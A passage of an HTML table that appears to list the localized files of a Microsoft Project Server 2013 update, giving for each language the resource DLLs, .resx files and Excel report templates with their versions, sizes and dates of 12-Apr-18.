00a0</td><td>36693</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.1041</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1171</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1041</td><td>project.actions4</td><td>\u00a0</td><td>6053</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1042</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>398000</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1042</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4567.1000</td><td>66752</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1042</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4442.1000</td><td>34952</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.1042</td><td>deliverables.xlsx</td><td>\u00a0</td><td>12070</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1042</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16872</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1042</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>18798</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectslist.xlsx.1042</td><td>projectslist.xlsx</td><td>\u00a0</td><td>12093</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>rejectedprojectslist.xlsx.1042</td><td>rejectedprojectslist.xlsx</td><td>\u00a0</td><td>12023</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcecapacity.xlsx.1042</td><td>resourcecapacity.xlsx</td><td>\u00a0</td><td>15891</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.1042</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24802</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>topprojects.xlsx.1042</td><td>topprojects.xlsx</td><td>\u00a0</td><td>13376</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowchart.xlsx.1042</td><td>workflowchart.xlsx</td><td>\u00a0</td><td>13807</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowdrilldown.xlsx.1042</td><td>workflowdrilldown.xlsx</td><td>\u00a0</td><td>12559</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1042</td><td>prjadmin.ko-kr.resx</td><td>\u00a0</td><td>32096</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1042</td><td>prjadmin.ko-kr.resx</td><td>\u00a0</td><td>32096</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1042</td><td>pwa.ko-kr.resx</td><td>\u00a0</td><td>834973</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1042</td><td>pwafeatures.ko-kr.resx</td><td>\u00a0</td><td>146496</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1042</td><td>pws.ko-kr.resx</td><td>\u00a0</td><td>34167</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.1042</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1126</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1042</td><td>project.actions4</td><td>\u00a0</td><td>5732</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1044</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>400560</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1044</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>63168</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1044</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16633</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1044</td><td>pwa.nb-no.resx</td><td>\u00a0</td><td>791989</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1044</td><td>pwafeatures.nb-no.resx</td><td>\u00a0</td><td>141529</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1044</td><td>pws.nb-no.resx</td><td>\u00a0</td><td>32802</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1043</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>395952</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1043</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>65728</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1043</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4442.1000</td><td>34968</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.1043</td><td>deliverables.xlsx</td><td>\u00a0</td><td>11960</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1043</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16608</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1043</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>18816</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectslist.xlsx.1043</td><td>projectslist.xlsx</td><td>\u00a0</td><td>11999</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>rejectedprojectslist.xlsx.1043</td><td>rejectedprojectslist.xlsx</td><td>\u00a0</td><td>11881</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcecapacity.xlsx.1043</td><td>resourcecapacity.xlsx</td><td>\u00a0</td><td>15746</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.1043</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24692</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>topprojects.xlsx.1043</td><td>topprojects.xlsx</td><td>\u00a0</td><td>13288</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowchart.xlsx.1043</td><td>workflowchart.xlsx</td><td>\u00a0</td><td>13685</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowdrilldown.xlsx.1043</td><td>workflowdrilldown.xlsx</td><td>\u00a0</td><td>12393</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1043</td><td>prjadmin.nl-nl.resx</td><td>\u00a0</td><td>30959</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1043</td><td>prjadmin.nl-nl.resx</td><td>\u00a0</td><td>30959</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1043</td><td>pwa.nl-nl.resx</td><td>\u00a0</td><td>820357</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1043</td><td>pwafeatures.nl-nl.resx</td><td>\u00a0</td><td>147117</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1043</td><td>pws.nl-nl.resx</td><td>\u00a0</td><td>33802</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.1043</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1083</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1043</td><td>project.actions4</td><td>\u00a0</td><td>5682</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1045</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>421552</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1045</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>67776</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1045</td><td>prjadmin.pl-pl.resx</td><td>\u00a0</td><td>32433</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1045</td><td>prjadmin.pl-pl.resx</td><td>\u00a0</td><td>32433</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1045</td><td>pwa.pl-pl.resx</td><td>\u00a0</td><td>833480</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1045</td><td>pwafeatures.pl-pl.resx</td><td>\u00a0</td><td>147824</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1046</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4553.1000</td><td>406208</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1046</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4567.1000</td><td>65728</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1046</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4442.1000</td><td>34456</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.1046</td><td>deliverables.xlsx</td><td>\u00a0</td><td>12013</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1046</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16710</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1046</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>19129</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectslist.xlsx.1046</td><td>projectslist.xlsx</td><td>\u00a0</td><td>12020</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>rejectedprojectslist.xlsx.1046</td><td>rejectedprojectslist.xlsx</td><td>\u00a0</td><td>11923</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcecapacity.xlsx.1046</td><td>resourcecapacity.xlsx</td><td>\u00a0</td><td>15754</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.1046</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24737</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>topprojects.xlsx.1046</td><td>topprojects.xlsx</td><td>\u00a0</td><td>13297</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowchart.xlsx.1046</td><td>workflowchart.xlsx</td><td>\u00a0</td><td>13709</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowdrilldown.xlsx.1046</td><td>workflowdrilldown.xlsx</td><td>\u00a0</td><td>12436</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1046</td><td>prjadmin.pt-br.resx</td><td>\u00a0</td><td>31730</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1046</td><td>prjadmin.pt-br.resx</td><td>\u00a0</td><td>31730</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1046</td><td>pwa.pt-br.resx</td><td>\u00a0</td><td>825666</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1046</td><td>pwafeatures.pt-br.resx</td><td>\u00a0</td><td>145370</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1046</td><td>pws.pt-br.resx</td><td>\u00a0</td><td>33765</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.1046</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1098</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1046</td><td>project.actions4</td><td>\u00a0</td><td>5654</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.2070</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>406192</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.2070</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>66240</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.2070</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4442.1000</td><td>34456</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.2070</td><td>deliverables.xlsx</td><td>\u00a0</td><td>12032</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.2070</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16651</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.2070</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>18932</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectslist.xlsx.2070</td><td>projectslist.xlsx</td><td>\u00a0</td><td>12007</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>rejectedprojectslist.xlsx.2070</td><td>rejectedprojectslist.xlsx</td><td>\u00a0</td><td>11895</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.2070</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24713</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>topprojects.xlsx.2070</td><td>topprojects.xlsx</td><td>\u00a0</td><td>13289</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowchart.xlsx.2070</td><td>workflowchart.xlsx</td><td>\u00a0</td><td>13683</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowdrilldown.xlsx.2070</td><td>workflowdrilldown.xlsx</td><td>\u00a0</td><td>12409</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.2070</td><td>prjadmin.pt-pt.resx</td><td>\u00a0</td><td>31715</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.2070</td><td>prjadmin.pt-pt.resx</td><td>\u00a0</td><td>31715</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.2070</td><td>pwa.pt-pt.resx</td><td>\u00a0</td><td>828163</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.2070</td><td>pwafeatures.pt-pt.resx</td><td>\u00a0</td><td>145144</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.2070</td><td>pws.pt-pt.resx</td><td>\u00a0</td><td>33965</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.2070</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1096</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.2070</td><td>project.actions4</td><td>\u00a0</td><td>5666</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1048</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>404144</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1048</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>66240</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1048</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4445.1000</td><td>34392</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.1048</td><td>deliverables.xlsx</td><td>\u00a0</td><td>12048</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1048</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16702</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcecapacity.xlsx.1048</td><td>resourcecapacity.xlsx</td><td>\u00a0</td><td>15755</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.1048</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24718</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1048</td><td>prjadmin.ro-ro.resx</td><td>\u00a0</td><td>31653</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1048</td><td>prjadmin.ro-ro.resx</td><td>\u00a0</td><td>31653</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1048</td><td>pwa.ro-ro.resx</td><td>\u00a0</td><td>827805</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1048</td><td>pwafeatures.ro-ro.resx</td><td>\u00a0</td><td>145495</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1048</td><td>pws.ro-ro.resx</td><td>\u00a0</td><td>34004</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1049</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4709.1000</td><td>483008</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1049</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>82112</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1049</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4442.1000</td><td>44168</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.1049</td><td>deliverables.xlsx</td><td>\u00a0</td><td>12245</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1049</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>17251</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1049</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>19855</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>projectslist.xlsx.1049</td><td>projectslist.xlsx</td><td>\u00a0</td><td>12220</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>rejectedprojectslist.xlsx.1049</td><td>rejectedprojectslist.xlsx</td><td>\u00a0</td><td>12142</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcecapacity.xlsx.1049</td><td>resourcecapacity.xlsx</td><td>\u00a0</td><td>15988</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.1049</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24964</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>topprojects.xlsx.1049</td><td>topprojects.xlsx</td><td>\u00a0</td><td>13526</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowchart.xlsx.1049</td><td>workflowchart.xlsx</td><td>\u00a0</td><td>13951</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>workflowdrilldown.xlsx.1049</td><td>workflowdrilldown.xlsx</td><td>\u00a0</td><td>12723</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1049</td><td>prjadmin.ru-ru.resx</td><td>\u00a0</td><td>37328</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1049</td><td>prjadmin.ru-ru.resx</td><td>\u00a0</td><td>37328</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1049</td><td>pwa.ru-ru.resx</td><td>\u00a0</td><td>1018260</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1049</td><td>pwafeatures.ru-ru.resx</td><td>\u00a0</td><td>170852</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1049</td><td>pws.ru-ru.resx</td><td>\u00a0</td><td>41514</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.1049</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1270</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1049</td><td>project.actions4</td><td>\u00a0</td><td>6446</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1051</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>407216</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1051</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>66240</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1051</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16836</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1051</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>19452</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>resourcecapacity.xlsx.1051</td><td>resourcecapacity.xlsx</td><td>\u00a0</td><td>15797</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>timesheetactuals.xlsx.1051</td><td>timesheetactuals.xlsx</td><td>\u00a0</td><td>24800</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>topprojects.xlsx.1051</td><td>topprojects.xlsx</td><td>\u00a0</td><td>13369</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1051</td><td>prjadmin.sk-sk.resx</td><td>\u00a0</td><td>32201</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1051</td><td>prjadmin.sk-sk.resx</td><td>\u00a0</td><td>32201</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1051</td><td>pwa.sk-sk.resx</td><td>\u00a0</td><td>819678</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1051</td><td>pwafeatures.sk-sk.resx</td><td>\u00a0</td><td>144335</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1051</td><td>pws.sk-sk.resx</td><td>\u00a0</td><td>34180</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1051</td><td>project.actions4</td><td>\u00a0</td><td>5747</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1060</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>403632</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1060</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>65728</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1060</td><td>prjadmin.sl-si.resx</td><td>\u00a0</td><td>31883</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1060</td><td>prjadmin.sl-si.resx</td><td>\u00a0</td><td>31883</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1060</td><td>pwa.sl-si.resx</td><td>\u00a0</td><td>803287</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1060</td><td>pwafeatures.sl-si.resx</td><td>\u00a0</td><td>141815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1060</td><td>pws.sl-si.resx</td><td>\u00a0</td><td>33533</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1060</td><td>project.actions4</td><td>\u00a0</td><td>5637</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1053</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>398528</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1053</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>64192</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1053</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>18635</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1053</td><td>prjadmin.sv-se.resx</td><td>\u00a0</td><td>30809</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1053</td><td>prjadmin.sv-se.resx</td><td>\u00a0</td><td>30809</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1053</td><td>pwa.sv-se.resx</td><td>\u00a0</td><td>804649</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1053</td><td>pwafeatures.sv-se.resx</td><td>\u00a0</td><td>142746</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1055</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>389808</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1055</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>64192</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1055</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4442.1000</td><td>33944</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1055</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>18621</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1055</td><td>prjadmin.tr-tr.resx</td><td>\u00a0</td><td>30801</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1055</td><td>prjadmin.tr-tr.resx</td><td>\u00a0</td><td>30801</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1055</td><td>pwa.tr-tr.resx</td><td>\u00a0</td><td>806190</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1055</td><td>pwafeatures.tr-tr.resx</td><td>\u00a0</td><td>144241</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1055</td><td>pws.tr-tr.resx</td><td>\u00a0</td><td>33222</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.templatexml.webtemppwa.xml.1055</td><td>webtemppwa.xml</td><td>\u00a0</td><td>1105</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1055</td><td>project.actions4</td><td>\u00a0</td><td>5538</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1058</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4508.1000</td><td>487600</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1058</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>80576</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin.prjadmin.resx.1058</td><td>prjadmin.uk-ua.resx</td><td>\u00a0</td><td>38267</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.wssadmin2.prjadmin.resx.1058</td><td>prjadmin.uk-ua.resx</td><td>\u00a0</td><td>38267</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.lcid.resx.1058</td><td>pwa.uk-ua.resx</td><td>\u00a0</td><td>1001528</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwa.resources.pwafeatures.resx.1058</td><td>pwafeatures.uk-ua.resx</td><td>\u00a0</td><td>170244</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pws.resources.pws.resx.1058</td><td>pws.uk-ua.resx</td><td>\u00a0</td><td>41562</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>project.actions4.1058</td><td>project.actions4</td><td>\u00a0</td><td>6736</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.2052</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4553.1000</td><td>379584</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.2052</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4567.1000</td><td>59584</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.2052</td><td>microsof